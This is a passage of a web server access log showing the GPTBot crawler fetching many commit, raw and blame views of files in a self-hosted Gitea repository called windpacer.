-[17/Feb/2026:14:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" -[17/Feb/2026:14:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" -[17/Feb/2026:14:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 12570] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" -[17/Feb/2026:14:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" -[17/Feb/2026:14:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" -[17/Feb/2026:14:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" -[17/Feb/2026:14:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23043] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23045] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 30468064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" -[17/Feb/2026:14:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 11994] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" -[17/Feb/2026:14:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9462] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" -[17/Feb/2026:14:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" -[17/Feb/2026:14:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10860] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" -[17/Feb/2026:14:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" -[17/Feb/2026:14:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14350] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" -[17/Feb/2026:14:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 11099] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23041] [Gzip 10.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 12570] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" -[17/Feb/2026:14:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10838] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" -[17/Feb/2026:14:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14351] [Gzip 27.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" -[17/Feb/2026:14:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" -[17/Feb/2026:14:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" -[17/Feb/2026:14:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" -[17/Feb/2026:14:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" -[17/Feb/2026:14:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" -[17/Feb/2026:14:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 10483] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" -[17/Feb/2026:14:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 11994] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" -[17/Feb/2026:14:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" -[17/Feb/2026:14:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" -[17/Feb/2026:14:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23044] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14323] [Gzip 27.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" -[17/Feb/2026:14:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23045] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10859] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" -[17/Feb/2026:14:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" -[17/Feb/2026:14:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" -[17/Feb/2026:14:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 10808] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" -[17/Feb/2026:14:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10860] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" -[17/Feb/2026:14:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 12542] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:12:09 +0000] - 200 